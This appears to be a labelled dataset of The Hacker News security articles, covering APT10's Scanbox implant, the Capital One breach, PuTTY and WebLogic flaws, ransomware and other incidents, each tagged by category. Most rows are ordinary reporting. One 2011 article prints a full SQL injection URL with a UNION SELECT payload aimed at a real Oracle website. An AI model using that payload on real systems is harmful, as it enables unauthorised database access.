According to a new report published today by Fidelis Cybersecurity firm, the Chinese APT10 hacking group implanted a piece of malware on the ""Events"" page of the US National Foreign Trade Council (NFTC) website in February.
Dubbed 'Operation TradeSecret,' the attack against the NFTC site is seen as an attempt to conduct surveillance on the main industry players and lobbyists closely associated with U.S trade policy activities.
Researchers say hackers placed a malicious link on the NFTC website, inviting the organization's board of directors to register for a meeting in Washington DC on March 7. But clicking on the link deployed a spying tool called ""Scanbox.""
Dates back to 2014, Scanbox – previously used by nation-state threat actors associated with the Chinese government – has the ability to record the type and versions of software a victim is running and run keyloggers on compromised computers, said Fidelis researcher John Bambenek.
""This attack was really at its core a reconnaissance attack. Anyone who visited this calendar entry would expose their software versions and use a JavaScript keylogger that could expose their identity,"" said Bambenek.
""Traditionally these attacks are used to precisely identify targets and help them craft targeted phishing attacks using exploits they know the victim is vulnerable to.""
The malicious link was active on the NFTC website between February 27 and March 1. The malware was already removed from the site by the time Fidelis contacted NFTC.
The NFTC's staff and board represent many influential people and companies -- from President Rufus Yerxa, the U.S. Ambassador to GATT to executives from major companies including Google, Amazon, eBay, IBM, Coca-Cola, Microsoft, Oracle, Cisco, KPMG, Pfizer, Visa, Ford, Halliburton, and Walmart.
Although Fidelis detected no further attacks on NFTC board members, the security firm believed the hackers were after a full range of entities relevant to the trade negotiations due to take place Thursday between US and China.
This is the second time in a week when APT10 cyber espionage campaign has come to light. A report released this week by BAE Systems, and PwC also claimed that APT10 was targeting managed IT services providers (MSPs) and their customers across the globe to steal sensitive data.
",Cyber_Attack
Call for Articles - July Edition | The Hacker News Monthly Magazine,https://thehackernews.com/2012/06/call-for-articles-july-edition-hacker.html,"Call for Articles - July Edition | The Hacker News Monthly Magazine
Attention Readers!! We know there is a writer in all of you and we invite you to submit your best work on the subject of BOTNETS for our July The Hacker News Monthly Magazine.
Give us all your expertise and knowledge on the subject and we will give it a top priority! We'd like to thank our readers and supporters and know that we take your loyalty seriously and with great appreciation.
See you in July!
Ann Smith
Executive Editor, The Hacker News
",Malware
FBI warns that Anonymous Hackers has been hacking US Government for almost a year,https://thehackernews.com/2013/11/fbi-warns-that-anonymous-hackers-has.html,"The FBI is warning that members of the hacktivist group Anonymous hacking collective have secretly accessed US Government computers and stolen sensitive information in a campaign that began almost a year ago.
The Hacktivists have exploited a flaw in Adobe applications to compromise the target systems and install software backdoors to maintain the control of the victims computers over the time, the facts dated back to last December, according to a Reuters report.
The hacking campaign affected the U.S. Army, Department of Energy, Department of Health and Human Services, and other government agencies, FBI reveals.
The Federal Bureau of Investigation memo called the hacking campaign ""a widespread problem that should be addressed."" and provided useful information for system administrators that how to determine if their networks were compromised.
Government investigators are investigating the scope of the hacking, believed that hackers are still operating under coverage.
""According to an internal email from Energy Secretary Ernest Moniz' chief of staff, Kevin Knobloch, the stolen data included personal information on at least 104,000 employees, contractors, family members and others associated with the Department of Energy, along with information on almost 2,0000 bank accounts. The email, dated October 11, said officials were ""very concerned"" that loss of the banking information could lead to thieving attempts."" states Reuters post.
It seems that the hacking campaign was linked to the case of Lauri Love, a British resident indicted on October 28 for allegedly breaking into computers at the Department of Energy, Army, Department of Health and Human Services, the U.S. Sentencing Commission and elsewhere.
Law enforcement sustains that attacks began when Love and other members of the group of hacktivists exploited a security flaw in Adobe's ColdFusion application, of course Adobe spokeswoman declined any responsibility and declared that similar attacks are possible only if targeted systems are not updated with the latest security patches.
Law enforcement confirmed that some of the stolen information on the latest campaign had previously been disclosed by Anonymous members during the ""Operation Last Resort.""
Despite the earlier disclosures, ""the majority of the intrusions have not yet been made publicly known,"" ""It is unknown exactly how many systems have been compromised, but it is a widespread problem that should be addressed."" the FBI wrote.
The cyber espionage campaigns conducted by Anonymous are the reply to the arrests of popular hackers linked to the collective linked to US retaliation strategy against hackers.
Consider hacktivism a transitory phenomena are dangerous, underestimate the capabilities of groups like Anonymous is a serious error and the FBI memo is an important warning for Governments and IT community ... Anonymous is alive and could hit every target in every moment!
",Cyber_Attack
Capital One Hacker Also Accused of Hacking 30 More Companies and CryptoJacking,https://thehackernews.com/2019/08/paige-thompson-capital-one.html,"Former Amazon employee Paige Thompson, who was arrested last month in relation to the Capital One data breach, has been accused of hacking not only the U.S. credit card issuer, but also more than 30 other companies.
An indictment unsealed on Wednesday revealed that Thompson not just stole data from misconfigured servers hosted with a cloud-computing company, but also used the computing power of hacked servers to mine for cryptocurrency, a practice commonly known as ""Cryptojacking.""
Thompson, known online as ""erratic,"" was arrested by the FBI on July 29 concerning a massive breach in Capital One Financial Corp that exposed the personal information of more than 100 million credit card applicants in the United States and 6 million in Canada.
The stolen data included approximately 140,000 Social Security numbers and 80,000 bank account numbers linked to United States customers, and 1 million Social Insurance numbers belonged to Canadian citizens, along with some customers' names, addresses, dates of birth, credit scores, credit limits, balances, payment history, and contact information.
Law enforcement became aware of Thompson's activity after she posted information relating to her theft of Capital One data on her GitHub account.
However, a federal grand jury yesterday charged Thompson with a total of two counts—one count of wire fraud and one count of computer fraud and abuse—for illicitly accessing data on more than 30 other entities, including Capital One, U.S. Department of Justice (DOJ) said.
While the indictment [PDF] did not name the involved cloud-computing company, it's highly likely to be Amazon as Thompson previously worked for Amazon Web Services, which provides cloud computing services to Capital One among others.
But it should also be noted that Amazon Web Services was not compromised in any way since Thompson gained access to the cloud server due to Capital One's misconfiguration and not through a vulnerability in Amazon's infrastructure.
The indictment also did not provide names of the other 30 victims, but it did describe three of the targeted organizations as a state agency outside the State of Washington, a telecommunications conglomerate outside the U.S. and a public research university outside the State of Washington.
Investigators have found no evidence of Thompson selling or disseminating any of the stolen information.
The 33-year-old Seattle-based software engineer remains in custody and is scheduled to be arraigned on the indictment in U.S. District Court in Seattle on September 5. She could face up to 25 years in prison if convicted.
",Cyber_Attack
German Researchers Break RFID Smartcard Encryption,https://thehackernews.com/2011/10/german-researchers-break-rfid-smartcard.html,"German Researchers Break RFID Smartcard Encryption
Scientists have found a way to circumvent the encryption used to protect a smartcard used to restrict access to buildings and to process public transit system payments.
A team of German scientists have demonstrated a hack that lets them make a perfect clone of the kind of magnetic security card used to give access to workers in corporate or government buildings -- including NASA -- and as a daily ticket replacement on buses and subways. The same team broke a previous version of contactless-ID cards from Mifare in 2008. This prompted the company to upgrade its security to create a card able to be programmed only once and which contained a unique identifying number that could be checked against the programmed content on the card for extra security.
The new hack is carried out using a side channel attack, which bypasses the defensive features intended to prevent attacks on the card. To achieve this, the researchers made repeated measurements of electricity consumption during encryption and decryption. This can be determined by measuring the magnetic field close to the card.
",Vulnerability
"Hackers leak 13,000 Passwords Of Amazon, Walmart and Brazzers Users",https://thehackernews.com/2014/12/password-hacking-data-breach.html,"Hackers claiming affiliation with the hacktivist group ""Anonymous"" have allegedly leaked more than 13,000 username and password combinations for some of the worlds most popular websites, including Amazon, Xbox Live and Playstation Network.
The stolen personal information was released in a massive text document posted to the Internet file-sharing website Ghostbin (now deleted), on Friday. The document contains a huge number of usernames and passwords, along with credit card numbers and expiration dates.
The news came just a day after the hacker group Lizard Squad compromised Sony's Playstation and Microsoft's Xbox Live gaming networks on Christmas day, which is estimated to have affected Xbox's 48 million subscribers and PlayStation's 110 million users, making it a total of more than 150 million users worldwide.
However, data breach of 13,000 users is not the biggest data breach we've ever seen. When millions of passwords are used for sites around the globe, chances are very minor that our's among those compromised. But still it's important to note as these accounts come from a variety of online sources and among those, some are really very popular.
The Daily Dot's Aaron Sankin has compiled a comprehensive list of sites associated with the username and password leaks, and discovered that the leaks came from the sites run the gamut from pornography to gaming to online shopping. The list of the compromised websites is as follows:
Amazon
Walmart
PlayStation Network
Xbox Live
Twitch.tv
Dell
Brazzers
DigitalPlayground
and see complete list.
Just to be on a safer side, users are recommended to change their passwords if they have accounts on these compromised websites, and also pay attention to your credit card transactions and if any suspicious activity found, immediately communicate with related banks and financial institutions.
Also, don't use the same passwords for banking and online shopping sites, and always keep an eye out for unusual activities or unauthorized purchases with your accounts.
",Data_Breaches
LOCKER Malware - Yet another new variant of Cryptolocker Ransomware,https://thehackernews.com/2013/12/locker-malware-yet-another-new-variant.html,"Ransomware, a threat to internet users that continues to grow in popularity with cyber criminals due to its success and monetary potential. This is nothing new and to be expected. I have noticed many discussions on underground hacking forums about ""How to create Ransomware like Cryptolocker malware"" or ""Malware - hacking tool-kit with ransomware features"".
Security intelligence provider, IntelCrawler has discovered a new ransomware variant called Locker that demands $150 (£92) to restore files that it has encrypted.
Like Cryptolocker, this new ransomware is also nasty because infected users are in danger of losing their personal files forever.
Locker mainly spreads by drive-by downloads from compromised websites, disguised itself as MP3 files and use system software vulnerabilities to infect the end user.
Once it has infected a system, malware first checks the infected machine has an internet connection or not. Then it deletes any original files from the victim's computer after using AES-CTR for encrypting the files on infected devices and add "". perfect"" extension to them.
Locker's encryption is based on an open source tool called 'TurboPower LockBox' library. After encrypting all files, the malware place a ""CONTACT.TXT"" file in each directory, which provides contact details of the author to buy the decryption key and once the ransom is paid, each victim gets a key to unscramble files.
The good news is that the researchers are working on the universal decryption software in order to help the victims. ""It appears that the hackers are simply comparing the list of infected IP addresses of users, along with their host names,"" according IntelCrawler.
IntelCrawler had discovered 50 different builds of the malware, which are being sold in underground markets for pay-per install programs. One builds had just under 6,000 infected machines. ZdNet reported.
Malware will encrypt all drives visible on an infected system, so you must be sure that your backups are stored remotely or in a location that is not simply another drive partition or mapping to another location.
The malware infects users from the United States, Turkey, Russia, Germany and the Netherlands. Users should remain vigilant about their security. Please double check the legitimacy of links received in emails and ensure you have your antivirus up to date to help protect against such threats.
",Vulnerability
Warning : Java 6 vulnerable to zero-day exploit; added to Neutrino exploit kit,https://thehackernews.com/2013/08/Java-6-zero-day-Neutrino-exploit-kit.html,"Hackers are using a new exploit for a bug in the out-of-date but popular Java 6 platform to attack victims, and has been added to a commercially available Neutrino exploit kit.
The use of Java 6 still is prevalent, opening up a significant number of users to the threat. F-secure analyst Timo Hirvonen warned about the exploit over Twitter, advising that he had found an exploit in the wild actively targeting an unpatched vulnerability in Java 6, named CVE-2013-2463.
The exploit's proof-of-concept was made public last week, prior to in-the-wild attacks surfacing on Monday. Oracle is aware of the hole but, since Java 6 is no longer supported, the company will not patch the issue.
The vulnerability lies in Java Runtime Environment's 2D sub-component, which is used to make two-dimensional graphics. Because no patch is available, the exploits provides cybercriminals and other attackers an effective vehicle to launch attacks targeting users and organizations using Java 6.
The Neutrino crimeware kit was first spotted in March 2013, when it was identified as the source of a series of attacks that were exploiting Java vulnerabilities to install ransomware on victims' PCs, freezing them until users paid a fine that was supposedly being levied by the FBI and other law enforcement agencies.
The impact of this threat may be less for usual Internet users than for organizations/entities, who may not be quick to migrate to the latest software version due to business and/or operational continuity issues.
Users should update their Java installations to the latest revision of version 7, which does not suffer from the issue. Users who don't need Java in their everyday tasks should uninstall the software altogether.
",Malware
New Critical Oracle WebLogic Flaw Under Active Attack — Patch Now,https://thehackernews.com/2019/06/oracle-weblogic-vulnerability.html,"Oracle has released an out-of-band emergency software update to patch a newly discovered critical vulnerability in the WebLogic Server.
According to Oracle, the vulnerability—which can be identified as CVE-2019-2729 and has a CVSS score of 9.8 out of 10—is already being exploited in the wild by an unnamed group of attackers.
Oracle WebLogic is a Java-based multi-tier enterprise application server that allows businesses to quickly deploy new products and services on the cloud, which is popular across both, cloud environment and conventional environments.
The reported vulnerability is a deserialization issue via XMLDecoder in Oracle WebLogic Server Web Services that could allow unauthorized remote attackers to execute arbitrary code on the targeted servers and take control over them.
""This remote code execution vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password,"" the advisory said.
In a separate note, the company also revealed that the flaw is related to a previously known deserialization vulnerability (CVE-2019-2725) in Oracle WebLogic Server that it patched in April this year.
The previously patched RCE flaw in Oracle WebLogic was also exploited by attackers as a zero-day i.e., to distribute Sodinokibi ransomware and cryptocurrency mining malware.
Reported independently by a separate group of individuals and organizations, the new vulnerability affects Oracle WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, and 12.2.1.3.0
Due to the severity of this vulnerability, the company has recommended affected users and companies to install available security updates as soon as possible.
Other Important Security Updates from Oracle
Besides this, Cisco today also released several other software updates for various of its products that to addresses some critical and high severity vulnerabilities.
Cisco TelePresence — a video conferencing system by Cisco, the software contains a high severity vulnerability that could allow remote attackers to execute arbitrary shell commands or scripts on the targeted device just by sending crafted CDP packets to an affected device.
Cisco SD-WAN Solution — The vManage web-based interface of the software-defined WAN solutions by Cisco contains three flaws, two of which have been rated high in severity, and one is critical. Two of these allow an attacker to elevate his privileges to the root user, whereas one flaw could allow an authenticated, remote attacker to execute arbitrary commands with root privileges.
Cisco Router Management Interface — Cisco's RV110W, RV130W, and RV215W Routers contains a denial-of-service vulnerability that could allow an unauthenticated attacker to cause a reload of an affected device. Another flaw in this product affected by a medium severity issue that could expose the list of devices that are connected to the guest network to remote attackers.
",Vulnerability
SYNful Knock: Backdoor Malware Found in Cisco Routers,https://thehackernews.com/2015/09/cisco-router-backdoor.html,"Mandiant, a FireEye sister concern has been involved in researches related to cyber defense.
In their recent findings, a backdoor malware named SYNful Knock identified as the one compromising the principles of Cisco routers with features such as...
...Having an everlasting effect, i.e. Serious Persistence.
What?- The malicious program is implanted in the router illicitly through the device's firmware (regardless of the vendor). The goal is achieved by modifying the router's firmware image, which exists even after the device gets a reboot.
How?- installing SYNful Knock in Cisco 1841 router, Cisco 2811 router, and Cisco 3825 router.
Affected areas- 14 instances in 4 countries including India, Mexico, Ukraine, and the Philippines.
Impact- the backdoor is backed up with such abilities that can compromise the availability of other hosts and access to sensitive data in an organization.
""The theoretical nature of router-focused attacks created a mindset within our industry to focus on building more walls around the perimeter, leaving many organizations exposed when it comes to foundational devices like routers,"" stated FireEye.
With this statement, we can imagine how dangerous is this backdoor!
As the implant is triggered by modifying the Cisco Inter-networked operating system (IOS), thus the implant activates in-capabilities in the Cisco victim like:
It allows the attacker to install various functional modules from the anonymity of the internet.
It provides unrestricted access using a wrapped backdoor password.
It delivers modules via the HTTP protocol and not HTTPS.
The controller (attacker) enables the TCP packets have a non-standard sequence and corresponding acknowledgment numbers.
The modules are disguised as independent executable code or hooks within the router's IOS with functionality similar to the backdoor password.
The backdoor password provides access to the router through the console and Telnet.
Also, The Hacker News (THN) reported about vulnerabilities in Belkin routers leading to privilege escalation and cyber attacks like man-in-the-middle attack. This is considered as an evident example where routers are being compromised on a large level.
Besides this, a document stating possibilities of how Cisco's IOS can be compromised and side-by-side protected against any malware can be seen here.
To get insights of this stealthy malware visit the stepwise demonstration executed by Mandiant.
",Malware
Oracle website vulnerable to SQL injection,https://thehackernews.com/2011/07/oracle-website-vulnerable-to-sql.html,"Oracle website vulnerable to SQL injection vulnerability
Oracle database website itself vulnerable to SQL injection attack. The website having a loophole by which any attacker can easily hack into it. The vulnerability is found and submitted by Hacker ""m@m@"".
Oracle provides the world's most complete, open, and integrated business software and hardware systems to more than 370,000 customers including 100 of the Fortune 100 that represent a variety of sizes and industries in more than 145 countries around the globe. The combination of Oracle and Sun means that customers can benefit from fully integrated systems the entire stack, from applications to disk that are faster, more reliable, and lower cost.
But the website now itself compromised with SQL injection attack. I am providing the link and a screen sort show that you can easily sort out the vulnerability.
Here is the link:
https://labs.oracle.com/dmp/patents.php?uid=mherlihy'%20and%201=0%20union%20select%201,2,table_name,4%20from%20information_schema.tables--%20-&show=all
Also Iframe Injection & Blind SQL Injection vulnerability on Apple.com exposed by Idahc(lebanese hacker) : Read here
",Vulnerability
PuTTY Releases Important Software Update to Patch 8 High-Severity Flaws,https://thehackernews.com/2019/03/putty-software-hacking.html,"The popular SSH client program PuTTY has released the latest version of its software that includes security patches for 8 high-severity security vulnerabilities.
PuTTY is one of the most popular and widely used open-source client-side programs that allows users to remotely access computers over SSH, Telnet, and Rlogin network protocols.
Almost 20 months after releasing the last version of its software, the developers of PuTTY earlier this week released the latest version 0.71 for Windows and Unix operating systems.
According to an advisory available on its website, all previous versions of the PuTTY software have been found vulnerable to multiple security vulnerabilities that could allow a malicious server or a compromised server to hijack client's system in different ways.
Here below I have listed all 8 vulnerabilities with brief information that PuTTY 0.71 has patched:
1) Authentication Prompt Spoofing — Since PuTTY doesn't have a way to indicate whether a piece of terminal output is genuine, the user-interface issue could be exploited by a malicious server to generate a fake authentication prompt at the client side, prompting victims to enter their private key passphrases.
""If the server had also acquired a copy of your encrypted key file (which, for example, you might have considered safe to copy around because it was securely encrypted), then this would give it access to your private key,"" the advisory explains.
2) Code Execution via CHM Hijacking — When a user launches the online help within the PuTTY GUI tools, the software tries to locate its help file alongside its own executable.
This behavior could allow an attacker to trick the user into executing malicious code on the client system via the hijacking CHM file.
""If you were running PuTTY from a directory that unrelated code could arrange to drop files into, this means that if somebody contrived to get a file called putty.chm into that directory, then PuTTY would believe it was the real help file, and feed it to htmlhelp.exe.""
3) Buffer Overflow in Unix PuTTY Tools — According to the advisory, if a server opens too many port forwardings, PuTTY for Unix does not bounds-check the input file descriptor it collects while monitoring the collections of active Unix file descriptors for activity, leading to a buffer overflow issue.
""We don't know if this was remotely exploitable, but it could at least be remotely triggered by a malicious SSH server, if you enabled any of the options that allow the server to open a channel: remote-to-local port forwarding, agent forwarding or X11 forwarding,"" the advisory says.
4) Reusing Cryptographic Random Numbers — This issue resides in the way cryptographic random number generator in PuTTY, occasionally using the same batch of random bytes twice.
""This occurred because of a one-byte buffer overflow in the random pool code. If entropy from an external source was injected into the random pool exactly when the current-position index was pointing at the very end of the pool, it would overrun the pool buffer by one byte and overwrite the low byte of the position index itself.""
5) Integer Overflow Flaw — All prior versions of PuTTY suffers an Integer overflow issue due to missing key-size check-in RSA key exchange.
A remote server can trigger the vulnerability by sending a short RSA key, leading to an integer overflow and uncontrolled overwriting of memory.
PuTTY developers are not sure if this flaw can be exploited to gain control over the client, but since the issue occurs during key exchange and happens before host key checking, the overflow can be induced by a MitM attack even if the middle man does not know the correct host key.
So even if you trust the server you think you are connecting to, you are not safe.""
6, 7 and 8) Terminal DoS Attacks — Last three vulnerabilities in PuTTY allows a server to crash, or slow down client's terminal by sending different text outputs.
Servers can send a long unbroken string of Unicode characters to the client's terminal, which could lead to a denial-of-service attack by causing the system to allocate potentially unlimited amounts of memory.
The second DoS attack can be triggered by sending combining characters, double-width text, an odd number of terminal columns, and GTK to the client's terminal in output.
In the third DoS attack, by sending width-2 characters used by Chinese, Japanese and Korean to the client, PuTTY's terminal emulator can be forced to crash.
If you use PuTTY, make sure you download and use the latest version of it.
",Vulnerability
"South Korea hit by Android Trojan, Malware in Gaming apps and DDoS attack",https://thehackernews.com/2013/10/south-korea-hit-by-android-trojan.html,"Last Tuesday, The National Police Agency of South Korea warned the people that many Malware infected video games being offered in the South Korean markets with the purpose of launching Cyber attacks on the Country.
That Malware is collecting location data and IP addresses of infected users and according to experts, malware is sending data back to its master servers based in North Korea.
Just today the Korea's largest anti-virus software firm AhnLab confirmed that they have detected distributed denial-of-service (DDoS) attacks on local companies' websites.
According to the report, about 16 websites of 13 companies, including Daum, MSN and the JoongAng Ilbo newspaper had been affected.
AhnLab said that some 10-thousand computers have been hit, mainly because they failed to install a vaccination program or update an existing one since the last cyber attack in July.
The attack was detected around 4:00 p.m. on Thursday, infecting around 10,000 computers until Friday.
It is possible that same infected systems were used to launch DDoS attacks today. Police advise the public to do not download gaming programs from unverified sources and to keep their Antivirus up to date.
Yesterday, we reported about another malicious campaign against South Korean Android users, where a Banking Trojan is specifically targeting South Korean banking applications for stealing user credentials.
In March, North Korea was suspected as responsible for for a malware attack that simultaneously wiped data from tens of thousands of South Korean computers.
",Cyber_Attack
iOS Sandbox Vulnerability Puts Enterprise Data at Risk,https://thehackernews.com/2015/08/apple-iphone-hacking.html,"""Change is the only constant thing,"" as it is known could be now modified as ""Change is the only constant thing*,"" where the * means Terms and conditions apply!
A change (Mobile Device Management solutions-MDM, Bring Your Own Device-BYOD) was brought to the organizations, (which later became necessities) for smooth workflow and management of an organization; where resides mobile and other computing devices in masses.
The devices, as well as the MDM solutions, are at risk, as reported.
Security researchers at Appthority Mobile Threat Team, have found a vulnerability in the sandbox app within the Apple's iOS versions prior to 8.4.1, which makes the configuration settings of managed applications to be openly accessed by anyone.
QuickSand – Loophole in Sandbox
The vulnerability is assigned CVE-2015-5749 and is named as 'QuickSand' because of the loophole being present in the Sandbox.
Mobile Device Management (MDM) refers to managing the deployment, security and integration of all the mobile devices, including smartphones, tablets, and laptops, in an organization.
The aim of MDM solutions is to increase the use of mobile devices by keeping them secure within the enterprise while simultaneously protecting the corporate network.
MDM solutions are mostly dependent on vendors who implement the services based on their devices' management features.
MDM and EMM (Enterprise Mobility Management) solutions are delivered by vendors like FancyFon, AirWatch, MobileIron and AmTel MDM, allowing organizations to install corporate apps, including configuration and credentials, to its mobile devices.
This poses as a solution for employees to get an easy access to corporate resources.
Now, the researchers claim this violation is capable of affecting all MDM clients as well as any mobile apps distributed via an MDM in a corporate environment that use the 'Managed App Configuration' setting to configure and store private settings and information.
Here's what the researchers at Appthority wrote in a blog post:
The underlying issue with our critical sandbox violation discovery is that not only can a mobile app (or the MDM app itself) have access to this sensitive set-up and authentication information stored on the device, but anyone (or any app on any device) can also see the credential [data] on the mobile device as it is stored 'world readable'.
How the Attack Works?
The attackers can fool the users - in an environment where the MDM solution has been implemented - in two ways:
Pushing a malicious app in the complete organization, imitating as a productivity app that many users may install.
Targeting a particular user and luring him into various cyber attacks like phishing.
This is a vital situation, where chances of an organization becoming victims of the severe cyber attack are high. Sensitivity and size of the information being managed using MDM solutions do matter.
As today, the vulnerability may not be that critical in nature but it has certainly opened gates for the potential attackers to get away with the data and information.
Appthority and Apple security have worked together to the fix the vulnerability, which has been patched but for the iOS version 8.4.1 as of now.
Further, Appthority Mobile Threat Team has demonstrated the weakness with the MDM and provides some recommendations; you can link to their official blog for in-depth details.
",Vulnerability
Malware Swipes Rocket Data from Japanese space agency,https://thehackernews.com/2012/12/malware-swipes-rocket-data-from.html,"Japan's space agency says it is investigating a possible leak of data about its Epsilon rocket due to a computer virus.
Malware Case : The Japan Aerospace Exploration Agency said the virus, in a computer at its Tsukuba Space Centre, north-east of Tokyo, was found to be secretly collecting data and sending it outside the agency.
JAXA said in a statement that information about the Epsilon, due to be launched next year, its M-5 rocket and H2A and H2B rockets may have been compromised. The agency said that it was unclear if the virus was a cyberattack. The agency said it is tightening security to prevent any further leaks.
China behind this Cyber Attack ? Recently, however, Japanese defense companies have been targets of similar information-stealing viruses, some of which had been traced back to China.
The Epsilon, whose first launching is scheduled for next autumn, will also feature new technology that will allow it to be remotely controlled by a personal computer. Japan is hoping to compete with the U.S., Russia, Europe and others as a satellite launch vehicle provider and has developed the Epsilon to reduce costs and speed up launch times.
",Malware
Android based hacking tool to steal passwords from connected computers,https://thehackernews.com/2013/07/android-based-hacking-tool-to-steal.html,"A recently discovered new form of Android malware called USB Cleaver can not only infect your smartphone, but also targets your PC to steal sensitive information from it.
A hacking tool discovered by analysts at F-Secure, which is capable of stealing information from a connected Windows machine. USBCleaver seems to be designed to facilitate a targeted attack by gathering details that would be helpful in a later infiltration attempt.
To use the application, hacker must install an application called USB Cleaver on his Android device. Once executed, the app downloads a ZIP file from a remote server and then unzips the downloaded file to the following location: /mnt/sdcard/usbcleaver/system folder.
Tools is design to steal information like Browser passwords (Firefox, Chrome and IE), PC's Wi-Fi password, The PC's network information etc.
When the device is then plugged into a PC, /mnt/sdcard is mounted and, if autorun is enabled, go.bat and the payload are executed. The app allows the user to select what type of information should be harvested. The utilities save their results in /mnt/sdcard/usbcleaver/logs which the app user can view later by clicking ""Log files"" in the app.
Most older Windows systems need to have mobile drivers manually installed in order for this attack to work. You can Download USB Cleaver here.
",Malware
Stuxnet virus also infected Chevron's IT network,https://thehackernews.com/2012/11/stuxnet-virus-also-infected-chevrons-it.html,"Stuxnet, a sophisticated computer virus created by the United States and Israel, to spy on and attack Iran's nuclear enrichment facilities in Natanz also infected Chevron 's network in 2010, immediately after it spread into the wild. This Government created virus Now Infecting Corporations also.
Chevron oil giant found the virus in its systems after the malware's existence was first reported in a blog post in July 2010, according to Mark Koelmel, general manager of the earth-sciences department at the big U.S. oil company. The U.S. government has never officially acknowledged the Stuxnet program.
Stuxnet which was designed to attack computer systems designed by German industrial giant Siemens for managing water supplies, oil rigs, power plants and other critical infrastructure has turned up in other countries.
According to the Wall Street Journal, Chevron's experience with Stuxnet appears to be the result of the malware's unintentional release into cyberspace, much like an experimental virus escaping from a medical lab.
""Two years ago, our security systems identified the Stuxnet virus. We immediately addressed the issue without incident,"" a Chevron representative said.
Even though Stuxnet targeted industrial facilities, it also infected regular PCs and as a result was discovered in June 2010, about a year after the earliest known version was believed to be created.
On other hand, U.S. officials have blamed Iran for creating the Shamoon virus, which was responsible for a cyber attack that infected more than 30,000 computers at Saudi Arabian oil company Saudi Aramco and Qatar's natural gas firm Rasgas in mid-August.
""I think the downside of what they did is going to be far worse than what they actually accomplished,"" Chevron .
",Cyber_Attack
US retailer Neiman Marcus confirmed data breach after TARGET,https://thehackernews.com/2014/01/us-retailer-neiman-marcus-confirmed_12.html,"The TARGET Hack was not the only massive Data breach that happened during the last Black Friday, but also other three major US Retailers were also hacked.
Recently, Neiman Marcus also confirmed a data breach that involves Credit card theft from its customers during the holiday shopping season, using similar techniques to the one that penetrated Target last month.
Neiman Marcus has 79 stores and reported total sales of $1.1 Billion in the Q4 2013. Neiman Marcus revealed that its customers are at risk after hackers breached servers of the company and accessed the payment information of those who visited its stores.
The company is working to inform customers whose cards have been used for fraudulent purchases, but differently from the case of retailer Target, the company hasn't provided information on the nature of data leaked and on the number of customer records exposed.
Neiman Marcus spokesperson Ginger Reeder announced that the company does not yet know the cause, size or duration of the data breach. She also added that there is no evidence of a possible impact on those shoppers who purchased from the online stores.
The entirety of the company's formal statement is as follows:
""Neiman Marcus was informed by our credit card processor in mid-December of potentially unauthorized payment card activity that occurred following customer purchases at our Neiman Marcus Group stores.
We informed federal law enforcement agencies and are working actively with the U.S. Secret Service, the payment brands, our credit card processor, a leading investigations, intelligence and risk management firm, and a leading forensic firm to investigate the situation. On January 1st, the forensics firm discovered evidence that the company was the victim of a criminal cyber-security intrusion and that some customers' cards were possibly compromised as a result. We have begun to contain the intrusion and have taken significant steps to further enhance information security.
The security of our customers' information is always a priority and we sincerely regret any inconvenience. We are taking steps, where possible, to notify customers whose cards we know were used fraudulently after making a purchase at our store.""
Neiman Marcus was informed in mid-December by its credit card processor and subsequently reported the data breach to law enforcement. The company apologized to its customers for the incident and confirmed that it is working to notify those whose cards were used fraudulently after visits to Neiman Marcus stores.
Cyber criminal activities are more frequent during the holiday season, experts hypothesized also a possible connection between this data breach and the one occurred to Target retailer.
""In the wake of the Target breach, customers, lawmakers and consumer advocates have stepped up calls for Congress to set guidelines on how merchants should protect consumer data. In a statement Friday, Sen. Edward J. Markey (D-Mass.) said that the Target breach illustrates a need for clear, strong privacy and security standards across all industries. When a number equal to nearly one-fourth of America's population is affected by a data breach, it is a serious concern that must be addressed,"" he said.
Are Target and Neiman Marcus two isolated cases?
""Target Corp and Neiman Marcus are not the only U.S. Retailers whose networks were breached over the holiday shopping season last year, according to sources familiar with attacks on other merchants that have yet to be publicly disclosed."" reported a post by Reuters.
According to the people familiar with the attacks, the technique adopted by attackers is the same to the one against Target. More breaches may have yet to come in light and rumors refers similar incidents may have occurred earlier last year.
There is the suspect the perpetrators may be the same as those who attacked Target retailer, likely the ring leaders are from Eastern Europe.
Security analysts expect an increment for illicit activities related to credit and debit card abuses, and they also sustain that it can be more difficult for retailers and credit card issuers to detect patterns of unusual spending.
",Data_Breaches
Malware called 'Eurograbber' steals 36 million Euros,https://thehackernews.com/2012/12/malware-called-eurograbber-steals-36.html,"A new version of the Zeus botnet was used to steal about $47 million from European banking customers in the past year. This Zeus variant Trojan is blamed for attacks that stole more than 36 million Euros ($47 million U.S. dollars) from an estimated 30,000 consumer and corporate accounts at European banks.
Dubbed ""Eurograbber"" is more than just another banking Trojan. It's an exploitation of fundamental online banking authentication practices that could strike any institution.
With the phone number and platform information, the attacker sends a text message to the victim's phone with a link to a site that downloads what it says is ""encryption software"" for the device. Customers become victims of Eurograbber by clicking on malicious links that may come in phishing-attack emails and then after injecting scripts to browser , the malware intercepts two-step authentication text messages sent to customers' phones.
Customers at an estimated 30 banks fell victims to the cyberheist. The amounts stolen ranged from between 500 to 250,000 euros ($650 to $327,000) and were removed from individual and corporate accounts in Italy, Spain, Germany and The Netherlands.
As online and mobile banking continue to grow, we will see more targeted attacks in this area, and Eurograbber is a prime example.
",Malware
"Google+ is Shutting Down After a Vulnerability Exposed 500,000 Users' Data",https://thehackernews.com/2018/10/google-plus-shutdown.html,"Google is going to shut down its social media network Google+ after the company suffered a massive data breach that exposed the private data of hundreds of thousands of Google Plus users to third-party developers.
According to the tech giant, a security vulnerability in one of Google+'s People APIs allowed third-party developers to access data for more than 500,000 users, including their usernames, email addresses, occupation, date of birth, profile photos, and gender-related information.
Since Google+ servers do not keep API logs for more than two weeks, the company cannot confirm the number of users impacted by the vulnerability.
However, Google assured its users that the company found no evidence that any developer was aware of this bug, or that the profile data was misused by any of the 438 developers that could have had access.
""However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected. Our analysis showed that up to 438 applications may have used this API,"" Google said in blog post published today.
The vulnerability was open since 2015 and fixed after Google discovered it in March 2018, but the company chose not to disclose the breach to the public—at the time when Facebook was being roasted for Cambridge Analytica scandal.
Though Google has not revealed the technical details of the security vulnerability, the nature of the flaw seems to be something very similar to Facebook API flaw that recently allowed unauthorized developers to access private data from Facebook users.
Besides admitting the security breach, Google also announced that the company is shutting down its social media network, acknowledging that Google+ failed to gain broad adoption or significant traction with consumers.
